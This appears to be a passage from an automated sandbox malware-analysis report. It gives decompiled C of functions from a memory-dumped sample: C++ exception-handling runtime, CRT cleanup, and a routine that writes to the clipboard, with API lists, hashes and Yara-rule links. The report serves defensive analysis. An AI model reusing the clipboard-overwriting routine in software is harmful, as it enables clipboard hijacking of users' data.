								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E0040E8C3(_t275, _t279, _t303, 0, _t322);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t212 = _t276 + 8;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E0040BEDC(_t274, _t279, _t303, _t308, 0);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E0040BEDC(_t274, _t279, _t303, _t308, 0) + 0x10);
								_t265 = E0040BEDC(_t274, _t279, _t303, _t308, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E0040BEDC(_t274, _t279, _t303, _t308, _t322) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E0040ABB3(_t274, _t279, _t308, _t322,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E0040C1A1(_t306, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0040A9F5(_t303, __eflags);
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E0040BEDC(_t274, _t279, _t303, _t308, _t322);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E0040CC37(_t274, _t308, _t322, _t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E0040BEDC(_t274, _t279, _t303, _t308, _t322) + 0x10) = _t274;
																	_t240 = E0040BEDC(_t274, _t279, _t303, _t308, _t322);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E0040BEDC(_t274, _t279, _t303, _t308, _t322) + 0x1c));
										_t270 = E0040BEDC(_t274, _t279, _t303, _t308, _t322);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E0040CC37(_t274, _t308, _t322, _t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E0040E887(_t274, _t290, _t303, _t308, __eflags);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E0040C8D0( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, 0x4231e4) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E0040A9F5(_t303, __eflags);
											_t279 =  &_v68;
											E0040C8B8( &_v68);
											E0040BA54( &_v68, 0x41fc24);
											L66:
											 *(E0040BEDC(_t274, _t279, _t303, _t308, _t322) + 0x10) = _t274;
											_t233 = E0040BEDC(_t274, _t279, _t303, _t308, _t322);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E0040AD97(_t279, _t234, _t274);
											E0040CB37(_a8, _a16, _t308);
											_t237 = E0040CCF4(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E0040CAB3(_t274, _t279, _t303, _t308, _t322, __eflags);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

0x0040c221
0x0040c221
0x0040c228
0x0040c22a
0x0040c233
0x0040c239
0x0040c23c
0x0040c241
0x0040c244
0x0040c24a
0x0040c5d1
0x0040c5d1
0x0040c5d6
0x0040c5d8
0x0040c5da
0x0040c5dd
0x0040c5de
0x0040c5e1
0x0040c5e7
0x0040c706
0x0040c5ed
0x0040c5ed
0x0040c5ee
0x0040c5ef
0x0040c5f6
0x0040c5f9
0x0040c5fc
0x0040c602
0x0040c604
0x0040c609
0x0040c60c
0x0040c60e
0x0040c614
0x0040c616
0x0040c61c
0x0040c631
0x0040c636
0x0040c639
0x0040c63b
0x0040c702
0x00000000
0x0040c703
0x0040c63b
0x0040c61c
0x0040c614
0x0040c60c
0x0040c641
0x0040c644
0x0040c647
0x0040c64a
0x0040c64d
0x0040c653
0x0040c665
0x0040c66a
0x0040c66d
0x0040c670
0x0040c673
0x0040c676
0x0040c679
0x0040c67c
0x00000000
0x00000000
0x0040c682
0x0040c682
0x0040c685
0x0040c688
0x0040c697
0x0040c698
0x0040c698
0x0040c69a
0x0040c69d
0x00000000
0x00000000
0x0040c69f
0x0040c6a2
0x00000000
0x00000000
0x0040c6b0
0x0040c6b2
0x0040c6b5
0x0040c6b7
0x0040c6bf
0x0040c6bf
0x0040c6c2
0x0040c6c4
0x0040c6c6
0x0040c6e2
0x0040c6e7
0x0040c6ea
0x0040c6ea
0x00000000
0x0040c6c2
0x0040c6b9
0x0040c6bd
0x00000000
0x00000000
0x00000000
0x0040c6ed
0x0040c6f0
0x0040c6f1
0x0040c6f4
0x0040c6f7
0x0040c6fa
0x0040c6fd
0x0040c6fd
0x00000000
0x0040c688
0x0040c707
0x0040c70c
0x0040c70d
0x0040c710
0x0040c713
0x0040c714
0x0040c715
0x0040c716
0x0040c719
0x0040c71b
0x0040c793
0x0040c795
0x0040c795
0x0040c71d
0x0040c71d
0x0040c720
0x0040c723
0x00000000
0x0040c725
0x0040c725
0x0040c728
0x0040c72b
0x0040c732
0x0040c732
0x0040c735
0x0040c737
0x0040c739
0x0040c76b
0x0040c76b
0x0040c76e
0x0040c775
0x0040c775
0x0040c778
0x0040c77b
0x0040c782
0x0040c782
0x0040c785
0x0040c78c
0x0040c78e
0x0040c78e
0x0040c787
0x0040c787
0x0040c78a
0x00000000
0x00000000
0x0040c78a
0x0040c77d
0x0040c77d
0x0040c780
0x00000000
0x00000000
0x0040c780
0x0040c770
0x0040c770
0x0040c773
0x00000000
0x00000000
0x0040c773
0x0040c78f
0x0040c73b
0x0040c73b
0x0040c73e
0x0040c73e
0x0040c740
0x0040c742
0x00000000
0x00000000
0x0040c744
0x0040c746
0x0040c75a
0x0040c75a
0x0040c748
0x0040c748
0x0040c74b
0x0040c74e
0x00000000
0x0040c750
0x0040c750
0x0040c753
0x0040c756
0x0040c758
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c758
0x0040c74e
0x0040c763
0x0040c763
0x0040c765
0x00000000
0x0040c767
0x0040c767
0x0040c767
0x00000000
0x0040c765
0x0040c75e
0x0040c760
0x0040c760
0x00000000
0x0040c760
0x0040c72d
0x0040c72d
0x0040c730
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c730
0x0040c72b
0x0040c723
0x0040c796
0x0040c79a
0x0040c79a
0x0040c259
0x0040c259
0x0040c262
0x0040c364
0x0040c364
0x00000000
0x0040c291
0x0040c291
0x0040c296
0x0040c366
0x0040c366
0x0040c369
0x00000000
0x0040c29c
0x0040c29c
0x0040c2a4
0x0040c568
0x0040c56c
0x0040c2aa
0x0040c2af
0x0040c2b2
0x0040c2b7
0x0040c2be
0x0040c2c3
0x00000000
0x0040c2fb
0x0040c303
0x0040c36e
0x0040c36e
0x0040c371
0x0040c374
0x0040c374
0x0040c377
0x0040c37a
0x0040c380
0x0040c537
0x0040c537
0x0040c53a
0x00000000
0x0040c53c
0x0040c53c
0x0040c540
0x00000000
0x0040c546
0x0040c546
0x0040c549
0x0040c54c
0x0040c54d
0x0040c54e
0x0040c551
0x0040c552
0x0040c555
0x0040c556
0x0040c55b
0x00000000
0x0040c55b
0x0040c540
0x0040c386
0x0040c386
0x0040c38a
0x00000000
0x0040c390
0x0040c390
0x0040c397
0x0040c3af
0x0040c3af
0x0040c3b2
0x0040c3b8
0x0040c3c8
0x0040c3cd
0x0040c3d0
0x0040c3d3
0x0040c3d6
0x0040c3d9
0x0040c3dc
0x0040c3df
0x0040c3e5
0x0040c3e5
0x0040c3e8
0x0040c3eb
0x0040c3fa
0x0040c3fb
0x0040c3fb
0x0040c3fd
0x0040c400
0x0040c406
0x0040c409
0x0040c40f
0x0040c411
0x0040c414
0x0040c417
0x0040c420
0x0040c423
0x0040c425
0x0040c425
0x0040c428
0x0040c42b
0x0040c42e
0x0040c431
0x0040c434
0x0040c439
0x0040c43a
0x0040c43b
0x0040c43c
0x0040c43d
0x0040c440
0x0040c442
0x0040c444
0x00000000
0x0040c446
0x0040c446
0x0040c446
0x0040c449
0x0040c44c
0x0040c44e
0x0040c44f
0x0040c454
0x0040c457
0x0040c459
0x00000000
0x00000000
0x0040c45b
0x0040c45c
0x0040c45f
0x0040c461
0x00000000
0x0040c463
0x0040c463
0x0040c466
0x0040c469
0x00000000
0x0040c469
0x00000000
0x0040c461
0x0040c47d
0x0040c483
0x0040c487
0x0040c4a4
0x0040c4a9
0x0040c4a9
0x0040c4ac
0x0040c4ac
0x00000000
0x0040c46c
0x0040c46c
0x0040c46d
0x0040c470
0x0040c473
0x0040c476
0x0040c476
0x00000000
0x0040c47b
0x0040c417
0x0040c409
0x0040c4af
0x0040c4b2
0x0040c4b3
0x0040c4b6
0x0040c4b9
0x0040c4bc
0x0040c4bf
0x0040c4bf
0x0040c4c8
0x0040c4cb
0x0040c4cb
0x0040c4cb
0x0040c3df
0x0040c4cd
0x0040c4d1
0x0040c4d3
0x0040c4d6
0x0040c4dc
0x0040c4dc
0x0040c4dd
0x0040c4e1
0x0040c55e
0x0040c55e
0x0040c563
0x0040c566
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c4e3
0x0040c4ea
0x0040c4ef
0x00000000
0x0040c4f1
0x0040c4f1
0x0040c4f5
0x0040c507
0x0040c50a
0x0040c50d
0x0040c50f
0x0040c526
0x0040c52a
0x0040c530
0x0040c531
0x0040c533
0x00000000
0x0040c535
0x00000000
0x0040c535
0x0040c511
0x0040c516
0x0040c519
0x0040c51e
0x0040c521
0x00000000
0x0040c521
0x0040c4f7
0x0040c4fa
0x0040c4fd
0x0040c4ff
0x00000000
0x0040c501
0x0040c501
0x0040c505
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c505
0x0040c4ff
0x0040c4f5
0x0040c4ef
0x0040c399
0x0040c399
0x0040c3a0
0x00000000
0x0040c3a2
0x0040c3a2
0x0040c3a9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c3a9
0x0040c3a0
0x0040c397
0x0040c38a
0x0040c305
0x0040c30d
0x0040c310
0x0040c315
0x0040c319
0x0040c31c
0x0040c322
0x0040c325
0x00000000
0x0040c327
0x0040c327
0x0040c32a
0x0040c32c
0x0040c56d
0x0040c56d
0x0040c332
0x0040c332
0x0040c334
0x0040c337
0x0040c353
0x0040c354
0x0040c357
0x0040c35a
0x0040c35c
0x00000000
0x0040c362
0x00000000
0x0040c362
0x00000000
0x0040c35c
0x0040c337
0x0040c572
0x0040c572
0x0040c574
0x0040c575
0x0040c57c
0x0040c57f
0x0040c58d
0x0040c592
0x0040c597
0x0040c59a
0x0040c59f
0x0040c5a2
0x0040c5a5
0x0040c5a8
0x0040c5aa
0x0040c5ac
0x0040c5ac
0x0040c5b1
0x0040c5bd
0x0040c5c3
0x0040c5c8
0x0040c5cb
0x0040c5cc
0x00000000
0x0040c5cc
0x0040c325
0x0040c303
0x0040c2c3
0x0040c2a4
0x0040c296
0x0040c262

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0040C31C
type_info::operator==.LIBVCRUNTIME ref: 0040C343
___TypeMatch.LIBVCRUNTIME ref: 0040C44F
IsInExceptionSpec.LIBVCRUNTIME ref: 0040C52A
_UnwindNestedFrames.LIBCMT ref: 0040C5B1
CallUnexpected.LIBVCRUNTIME ref: 0040C5CC

Strings

csm, xrefs: 0040C25C
csm, xrefs: 0040C2C9
csm, xrefs: 0040C37A

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 753fde206bba4354c0c50ce11ce1c534c56d62ed1e7d5b4d9433cc75b152663f
Instruction ID: 2f44ff3d0b8fae329880e9b58925e68426c56987ce0675bba190c6e5638ddc17
Opcode Fuzzy Hash: 753fde206bba4354c0c50ce11ce1c534c56d62ed1e7d5b4d9433cc75b152663f
Instruction Fuzzy Hash: 49C16775800219EFCF25DFA5C8819AEBBB5FF04314F10426BE8047B292D779EA51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 03F5C471, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 03F5C56C
type_info::operator==.LIBVCRUNTIME ref: 03F5C593
___TypeMatch.LIBVCRUNTIME ref: 03F5C69F
IsInExceptionSpec.LIBVCRUNTIME ref: 03F5C77A
_UnwindNestedFrames.LIBCMT ref: 03F5C801
CallUnexpected.LIBVCRUNTIME ref: 03F5C81C

Strings

csm, xrefs: 03F5C4AC
csm, xrefs: 03F5C5CA
csm, xrefs: 03F5C519

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 753fde206bba4354c0c50ce11ce1c534c56d62ed1e7d5b4d9433cc75b152663f
Instruction ID: b8ef7ceec77b8b5da45f515bed5b759ea1f168c12548b19a4158e0ae97b69bc9
Opcode Fuzzy Hash: 753fde206bba4354c0c50ce11ce1c534c56d62ed1e7d5b4d9433cc75b152663f
Instruction Fuzzy Hash: C1C15AB5C0031AAFCF25DFA4D8809AEBBB9BF04310F18419AFE166B611D735DA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECC8, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040ECC8(void* __edx, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0x41a728;
				if(_t67 != 0x41a728) {
					E0040F096(_t67);
					_t36 = _a4;
				}
				E0040F096( *((intOrPtr*)(_t36 + 0x3c)));
				E0040F096( *((intOrPtr*)(_a4 + 0x30)));
				E0040F096( *((intOrPtr*)(_a4 + 0x34)));
				E0040F096( *((intOrPtr*)(_a4 + 0x38)));
				E0040F096( *((intOrPtr*)(_a4 + 0x28)));
				E0040F096( *((intOrPtr*)(_a4 + 0x2c)));
				E0040F096( *((intOrPtr*)(_a4 + 0x40)));
				E0040F096( *((intOrPtr*)(_a4 + 0x44)));
				E0040F096( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E0040EAF4(_t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0040EB5F(_t71, _t72, _t76);
			}

0x0040ecc8
0x0040ecc8
0x0040eccd
0x0040ecd3
0x0040ecd5
0x0040ecdb
0x0040ecde
0x0040ece3
0x0040ece6
0x0040ecea
0x0040ecf5
0x0040ed00
0x0040ed0b
0x0040ed16
0x0040ed21
0x0040ed2c
0x0040ed37
0x0040ed45
0x0040ed50
0x0040ed58
0x0040ed59
0x0040ed5c
0x0040ed62
0x0040ed66
0x0040ed6a
0x0040ed6b
0x0040ed75
0x0040ed7b
0x0040ed7c
0x0040ed7f
0x0040ed85
0x0040ed89
0x0040ed8d
0x0040ed94

APIs

_free.LIBCMT ref: 0040ECDE

Part of subcall function 0040F096: HeapFree.KERNEL32(00000000,00000000,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?), ref: 0040F0AC
Part of subcall function 0040F096: GetLastError.KERNEL32(?,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?,?), ref: 0040F0BE

_free.LIBCMT ref: 0040ECEA
_free.LIBCMT ref: 0040ECF5
_free.LIBCMT ref: 0040ED00
_free.LIBCMT ref: 0040ED0B
_free.LIBCMT ref: 0040ED16
_free.LIBCMT ref: 0040ED21
_free.LIBCMT ref: 0040ED2C
_free.LIBCMT ref: 0040ED37
_free.LIBCMT ref: 0040ED45

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e643143f3eb673994d99897029b15efbcb706820c10e6ff95093cf3485777ed7
Instruction ID: 1a455e871374a625c9fc056239d91ca01f3b9558c4772566c8c760431990caa5
Opcode Fuzzy Hash: e643143f3eb673994d99897029b15efbcb706820c10e6ff95093cf3485777ed7
Instruction Fuzzy Hash: 0121BC76904108AFCB11EFA5C941DDE7BB4BF08344F00457AF615AB562FB36DA54CB84

Uniqueness

Uniqueness Score: -1.00%

Function 03F5EF18, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03F5EF2E

Part of subcall function 03F5F2E6: HeapFree.KERNEL32(00000000,00000000,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?), ref: 03F5F2FC
Part of subcall function 03F5F2E6: GetLastError.KERNEL32(?,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?,?), ref: 03F5F30E

_free.LIBCMT ref: 03F5EF3A
_free.LIBCMT ref: 03F5EF45
_free.LIBCMT ref: 03F5EF50
_free.LIBCMT ref: 03F5EF5B
_free.LIBCMT ref: 03F5EF66
_free.LIBCMT ref: 03F5EF71
_free.LIBCMT ref: 03F5EF7C
_free.LIBCMT ref: 03F5EF87
_free.LIBCMT ref: 03F5EF95

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e643143f3eb673994d99897029b15efbcb706820c10e6ff95093cf3485777ed7
Instruction ID: cb1f0fa12062676243bd2136ffa8edc39105e1bdca036a55d6213b8106a09146
Opcode Fuzzy Hash: e643143f3eb673994d99897029b15efbcb706820c10e6ff95093cf3485777ed7
Instruction Fuzzy Hash: FD2169BA914208EFCB41EF94CD40DED7FB5AF08240B1181AAFB159F161EB31D654CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004090E8, Relevance: 12.1, APIs: 8, Instructions: 57
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090E8(void* __ecx) {
				void* _t8;
				void* _t16;
				intOrPtr* _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				void* _t26;

				_t19 =  *((intOrPtr*)(_t26 + 0x14));
				_t23 =  *((intOrPtr*)(_t19 + 0x10));
				if(_t23 == 0) {
					L12:
					return 0;
				}
				_t22 = __ecx;
				if( *((intOrPtr*)(_t19 + 0x14)) > 7) {
					_t19 =  *_t19;
				}
				if(_t19 == 0) {
					goto L12;
				} else {
					_t25 = _t23 + _t23 + 2;
					_t8 = GlobalAlloc(2, _t23 + _t23 + 2);
					if(_t8 == 0) {
						goto L12;
					}
					_t21 = _t8;
					if(GlobalLock(_t8) == 0) {
						EmptyClipboard();
						L11:
						GlobalFree(_t21);
						goto L12;
					}
					E0040B4E0(_t9, _t19, _t25);
					GlobalUnlock(_t21);
					EmptyClipboard();
					if(SetClipboardData(0xd, _t21) == 0) {
						goto L11;
					}
					_t16 =  *(_t22 + 4);
					if(_t16 != 0) {
						GlobalFree(_t16);
					}
					 *(_t22 + 4) = _t21;
					return 1;
				}
			}

0x004090ec
0x004090f0
0x004090f5
0x0040916e
0x00000000
0x0040916e
0x004090fb
0x004090fd
0x004090ff
0x004090ff
0x00409103
0x00000000
0x00409105
0x0040910c
0x00409110
0x00409118
0x00000000
0x00000000
0x0040911a
0x00409125
0x00409161
0x00409167
0x00409168
0x00000000
0x00409168
0x0040912a
0x00409133
0x00409139
0x0040914a
0x00000000
0x00000000
0x0040914c
0x00409151
0x00409154
0x00409154
0x0040915a
0x00000000
0x0040915d

APIs

GlobalAlloc.KERNEL32(00000002,?,?,?,00000000,?,00409028,?,?), ref: 00409110
GlobalLock.KERNEL32 ref: 0040911D
GlobalUnlock.KERNEL32(00000000,00409028,?,?), ref: 00409133
EmptyClipboard.USER32 ref: 00409139
SetClipboardData.USER32(0000000D,00000000), ref: 00409142
GlobalFree.KERNEL32 ref: 00409154
EmptyClipboard.USER32(?,00000000,?,00409028,?,?), ref: 00409161
GlobalFree.KERNEL32 ref: 00409168

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Global$Clipboard$EmptyFree$AllocDataLockUnlock
String ID:
API String ID: 2756949299-0
Opcode ID: cd821e2c44d2fd66c4ce904e60074f91c411499358efcbcca8f03438172143ae
Instruction ID: 791c314b85363329de16f02c17da37bde676904bae117c779cf924d9f261a5b2
Opcode Fuzzy Hash: cd821e2c44d2fd66c4ce904e60074f91c411499358efcbcca8f03438172143ae
Instruction Fuzzy Hash: 70016175708305ABE7206FB1AC8CA6B3BBCEB55745B04443AF901D6392DA79DC008639

Uniqueness

Uniqueness Score: -1.00%

Function 03F59338, Relevance: 12.1, APIs: 8, Instructions: 57clipboardmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,?,?,00000000,?,03F59278,?,?), ref: 03F59360
GlobalFix.KERNEL32(00000000), ref: 03F5936D
GlobalUnWire.KERNEL32(00000000), ref: 03F59383
EmptyClipboard.USER32 ref: 03F59389
SetClipboardData.USER32(0000000D,00000000), ref: 03F59392
GlobalFree.KERNEL32(?), ref: 03F593A4
EmptyClipboard.USER32 ref: 03F593B1
GlobalFree.KERNEL32(00000000), ref: 03F593B8

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: Global$Clipboard$EmptyFree$AllocDataWire
String ID:
API String ID: 4083300601-0
Opcode ID: cd821e2c44d2fd66c4ce904e60074f91c411499358efcbcca8f03438172143ae
